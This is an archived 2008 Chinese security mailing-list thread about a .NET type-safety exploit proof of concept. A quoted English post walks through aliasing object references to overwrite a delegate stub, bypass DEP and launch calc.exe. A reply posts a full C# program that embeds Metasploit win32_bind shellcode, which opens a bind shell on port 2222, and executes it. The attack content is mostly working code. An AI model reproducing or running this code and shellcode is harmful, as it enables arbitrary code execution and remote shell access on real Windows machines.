无语了,你们都已经C#了,我还在C呢。
From: ayaREI Sent: Wednesday, September 17, 2008 7:09 PM To: [email protected] Subject: [Ph4nt0m] Re: Writing a .NET Security Exploit PoC 云舒牛牛果然厉害.... 据tankaiha大牛说XX东西的漏洞是很多的,看来需要学习的啊 2008/9/17 云舒 <[EMAIL PROTECTED]> using System; using System.IO; using System.Threading; using System.Text; using System.Runtime.InteropServices; class Union1 { internal volatile int i = 0; internal volatile int j; } class Union2 { internal volatile object o; internal volatile int[] arr = null; } class TypeSafetyExploitPoC { [StructLayout(LayoutKind.Explicit)] struct UnsafeUnion { [FieldOffset(0)] internal Union1 u1; [FieldOffset(0)] internal Union2 u2; } static Union1 TypeSystemHole(Union2 u2) { // NOT ACTUALLY A SECURITY HOLE! // You need full trust to execute this code. UnsafeUnion uu = new UnsafeUnion(); uu.u2 = u2; return uu.u1; } static void DummyMethod() { } internal static void Main(string[] args) { Union1 u1; Union2 u2 = new Union2(); u1 = TypeSystemHole(u2); ThreadStart del = new ThreadStart(DummyMethod); u2.o = del; u1.j = u1.i; u1.j = u2.arr[2] - 12; MemoryStream mem = new MemoryStream(); BinaryWriter bw = new BinaryWriter(mem); BinaryReader reader = new BinaryReader(mem); try { // win32_bind - EXITFUNC=thread LPORT=2222 Size=344 Encoder=PexFnstenvSub http://metasploit.com byte[] shellcode = { 0x29, 0xc9, 0x83, 0xe9, 0xb0, 0xd9, 0xee, 0xd9, 0x74, 0x24, 0xf4, 0x5b, 0x81, 0x73, 0x13, 0x0e, 0x4b, 0x46, 0x7e, 0x83, 0xeb, 0xfc, 0xe2, 0xf4, 0xf2, 0x21, 0xad, 0x33, 0xe6, 0xb2, 0xb9, 0x81, 0xf1, 0x2b, 0xcd, 0x12, 0x2a, 0x6f, 0xcd, 0x3b, 0x32, 0xc0, 0x3a, 0x7b, 0x76, 0x4a, 0xa9, 0xf5, 0x41, 0x53, 0xcd, 0x21, 0x2e, 0x4a, 0xad, 0x37, 0x85, 0x7f, 0xcd, 0x7f, 0xe0, 0x7a, 0x86, 0xe7, 0xa2, 0xcf, 0x86, 0x0a, 0x09, 0x8a, 0x8c, 0x73, 0x0f, 0x89, 0xad, 0x8a, 0x35, 0x1f, 0x62, 0x56, 0x7b, 0xae, 0xcd, 0x21, 0x2a, 0x4a, 0xad, 0x18, 0x85, 0x47, 0x0d, 0xf5, 0x51, 0x57, 0x47, 0x95, 0x0d, 0x67, 0xcd, 0xf7, 0x62, 0x6f, 0x5a, 0x1f, 0xcd, 0x7a, 0x9d, 0x1a, 0x85, 0x08, 0x76, 0xf5, 0x4e, 0x47, 0xcd, 0x0e, 0x12, 0xe6, 0xcd, 0x3e, 0x06, 0x15, 0x2e, 0xf0, 0x40, 0x45, 0xaa, 0x2e, 0xf1, 0x9d, 0x20, 0x2d, 0x68, 0x23, 0x75, 0x4c, 0x66, 0x3c, 0x35, 0x4c, 0x51, 0x1f, 0xb9, 0xae, 0x66, 0x80, 0xab, 0x82, 0x35, 0x1b, 0xb9, 0xa8, 0x51, 0xc2, 0xa3, 0x18, 0x8f, 0xa6, 0x4e, 0x7c, 0x5b, 0x21, 0x44, 0x81, 0xde, 0x23, 0x9f, 0x77, 0xfb, 0xe6, 0x11, 0x81, 0xd8, 0x18, 0x15, 0x2d, 0x5d, 0x18, 0x05, 0x2d, 0x4d, 0x18, 0xb9, 0xae, 0x68, 0x23, 0x4e, 0xd0, 0x68, 0x18, 0xcf, 0x9f, 0x9b, 0x23, 0xe2, 0x64, 0x7e, 0x8c, 0x11, 0x81, 0xd8, 0x21, 0x56, 0x2f, 0x5b, 0xb4, 0x96, 0x16, 0xaa, 0xe6, 0x68, 0x97, 0x59, 0xb4, 0x90, 0x2d, 0x5b, 0xb4, 0x96, 0x16, 0xeb, 0x02, 0xc0, 0x37, 0x59, 0xb4, 0x90, 0x2e, 0x5a, 0x1f, 0x13, 0x81, 0xde, 0xd8, 0x2e, 0x99, 0x77, 0x8d, 0x3f, 0x29, 0xf1, 0x9d, 0x13, 0x81, 0xde, 0x2d, 0x2c, 0x1a, 0x68, 0x23, 0x25, 0x13, 0x87, 0xae, 0x2c, 0x2e, 0x57, 0x62, 0x8a, 0xf7, 0xe9, 0x21, 0x02, 0xf7, 0xec, 0x7a, 0x86, 0x8d, 0xa4, 0xb5, 0x04, 0x53, 0xf0, 0x09, 0x6a, 0xed, 0x83, 0x31, 0x7e, 0xd5, 0xa5, 0xe0, 0x2e, 0x0c, 0xf0, 0xf8, 0x50, 0x81, 0x7b, 0x0f, 0xb9, 0xa8, 0x55, 0x1c, 0x14, 0x2f, 0x5f, 0x1a, 0x2c, 0x7f, 0x5f, 0x1a, 0x13, 0x2f, 0xf1, 0x9b, 0x2e, 0xd3, 0xd7, 0x4e, 0x88, 0x2d, 0xf1, 0x9d, 0x2c, 0x81, 0xf1, 0x7c, 0xb9, 0xae, 0x85, 0x1c, 0xba, 0xfd, 0xca, 0x2f, 0xb9, 0xa8, 0x5c, 0xb4, 0x96, 0x16, 0xe1, 0x85, 0xa6, 0x1e, 0x5d, 0xb4, 0x90, 0x81, 0xde, 0x4b, 0x46, 0x7e }; bw.Write( shellcode, 0, shellcode.Length ); } catch( Exception e ) { Console.WriteLine( "Write error." + e.Message ); } try { byte[] tmp = mem.ToArray(); for (int i = 0; i < tmp.Length / 4; i++) { u2.arr[1 + i] = BitConverter.ToInt32(tmp, i * 4); } del(); } catch { } } } 2008-09-17 ------------------------------------------------------------------------------ 云舒 ------------------------------------------------------------------------------ 发件人: Program_Worker 发送时间: 2008-09-17 11:24:40 收件人: Ph4nt0m 抄送: 主题: [Ph4nt0m] Re: Writing a .NET Security Exploit PoC VS2008测试没有通过 On 9月16日, 上午10时59分, 大风 <[EMAIL PROTECTED]> wrote: > Let's start out with some convenient types that allow bit twiddeling once > we've subverted the type system: > > class Union1 > { > internal volatile int i; > internal volatile int j; > > } > > class Union2 > { > internal volatile object o; > internal volatile int[] arr; > > } > > Now we need a way to get two different references to the same object. This > is where the exploit comes in, but since I'm not going to publish an exploit > for an unpatched bug, we'll make do with something that works but requires > full trust: > > [StructLayout(LayoutKind.Explicit)] > struct UnsafeUnion > { > [FieldOffset(0)] > internal Union1 u1; > [FieldOffset(0)] > internal Union2 u2; > > } > > static Union1 TypeSystemHole(Union2 u2) > { > // NOT ACTUALLY A SECURITY HOLE! > // You need full trust to execute this code. > UnsafeUnion uu = new UnsafeUnion(); > uu.u2 = u2; > return uu.u1; > > } > > Now for the interesting bit, getting some x86 code to execute: > > Union1 u1; > Union2 u2 = new Union2(); > u1 = TypeSystemHole(u2); > > // u1 and u2 now reference the same object, > // meaning that we can now convert arbitrary integer > // into objects or arrays (and v.v.) > > ThreadStart del = new ThreadStart(DummyMethod); > > // A delegate provides an easy way to call the code we're > // generating. As it turns out, it is also a good way > // to bypass DEP, because the delegate stub is in writable > // executable memory. > > u2.o = del; > u1.j = u1.i; > u1.j = u2.arr[2] - 12; > > // Make the delegate object accessible via the object[], > // then get the address the delegate points to and make > // it accessible via the object[] reference. > > // The x86 code we're creating is: > // > // 6A 05 push 5 > // 68 xx xx xx xx push offset string "calc.exe" > // B8 xx xx xx xx mov eax,<address of kernel32!WinExec> > // FF D0 call eax > // C3 ret > // > > MemoryStream mem = new MemoryStream(); > BinaryWriter bw = new BinaryWriter(mem); > bw.Write((byte)0x6A); > bw.Write((byte)0x05); > bw.Write((byte)0x68); > u2.o = Encoding.ASCII.GetBytes("calc.exe\0"); > bw.Write(u1.i + 8); > bw.Write((byte)0xB8); > bw.Write(GetProcAddressAny("WinExec")); > bw.Write((byte)0xFF); > bw.Write((byte)0xD0); > bw.Write((byte)0xC3); > bw.Write(0); > > // Now that we've created the code, copy it into the delegate > // stub memory area. > > byte[] tmp = mem.ToArray(); > for (int i = 0; i < tmp.Length / 4; i++) > { > u2.arr[1 + i] = BitConverter.ToInt32(tmp, i * 4); > > } > > // Invoke the delegate, which will result in running our > // code, instead of the delegate stub. > > del(); > > The missing piece is GetProcAddressAny. It basically searches memory for > kernel32 and looks up the address of the WinExec function. > > The full source is available here: TypeSafetyExploitPoC.cs > <http://www.frijters.net/TypeSafetyExploitPoC.cs.txt> > > Note that this PoC requires full trust and obviously only works on x86, but > all the ideas are applicable to x64 as well. > > 2008-9-13 9:03:01 (W. Europe Daylight Time, UTC+02:00) > > [Ph4nt0m] <http://www.ph4nt0m.org/> > > [Ph4nt0m Security Team] > > <http://blog.ph4nt0m.org/> [EMAIL PROTECTED] > > Email: [EMAIL PROTECTED] > > PingMe: > <http://cn.pingme.messenger.yahoo.com/webchat/ajax_webchat.php?yid=han... > hq&sig=9ae1bbb1ae99009d8859e88e899ab2d1c2a17724> > > === V3ry G00d, V3ry Str0ng === > > === Ultim4te H4cking === > > === XPLOITZ ! === > > === #_# === > > #If you brave,there is nothing you cannot achieve.# > > image001.gif > 5K查看下载 --~--~---------~--~----~------------~-------~--~----~ 要向邮件组发送邮件,请发到 [email protected] 要退订此邮件,请发邮件至 [EMAIL PROTECTED] -~----------~----~----~----~------~----~------~--~---
